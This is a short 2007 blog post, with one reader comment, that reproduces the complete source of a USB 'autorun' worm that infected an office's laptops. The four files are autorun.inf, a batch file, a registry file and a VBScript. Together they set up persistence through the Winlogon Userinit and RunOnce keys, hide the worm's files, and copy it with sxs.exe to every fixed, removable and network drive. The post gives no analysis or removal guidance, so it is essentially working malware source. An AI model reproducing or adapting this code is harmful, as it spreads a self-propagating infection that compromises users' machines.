Tue 26 Jun 2007
Recently all the laptops in our office got attacked by some "autorun" worm.
Here is the source code for these files. The files can be found in %systemroot%\system32\ folder and all infected root drives.
1. Autorun.inf
[autorun]
shell\open=打开(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=WScript.exe .\autorun.vbs
2. Autorun.bat
@echo off
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
‘;免杀
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
‘;免杀
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="-" attrib -s -a -h -r %2\sxs.exe
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\sxs.exe
:end
3. Autorun.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"autorun"="sxs.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000
"Hidden"=dword:00000002
4. Autorun.vbs
on error resume next
Set WshShell =CreateObject("WScript.Shell")
if 1=0 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.bat",d&"\",True
Of.CopyFile dir&"\sxs.exe",d&"\",True
Of.CopyFile dir&"\autorun.inf",d&"\",True
Of.CopyFile dir&"\autorun.reg",d&"\",True
Of.CopyFile dir&"\autorun.vbs",d&"\",True
else
Of.CopyFile "autorun.bat",d&"\",True
Of.CopyFile "sxs.exe",d&"\",True
Of.CopyFile "autorun.inf",d&"\",True
Of.CopyFile "autorun.reg",d&"\",True
Of.CopyFile "autorun.vbs",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.bat",dir&"\",True
Of.CopyFile "sxs.exe",dir&"\",True
Of.CopyFile "autorun.inf",dir&"\",True
Of.CopyFile "autorun.reg",dir&"\",True
Of.CopyFile "autorun.vbs",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if
Some rights reserved.
December 17th, 2007 at 2:56 pm
very technical…how’s it like as an IT geek in Shanghai?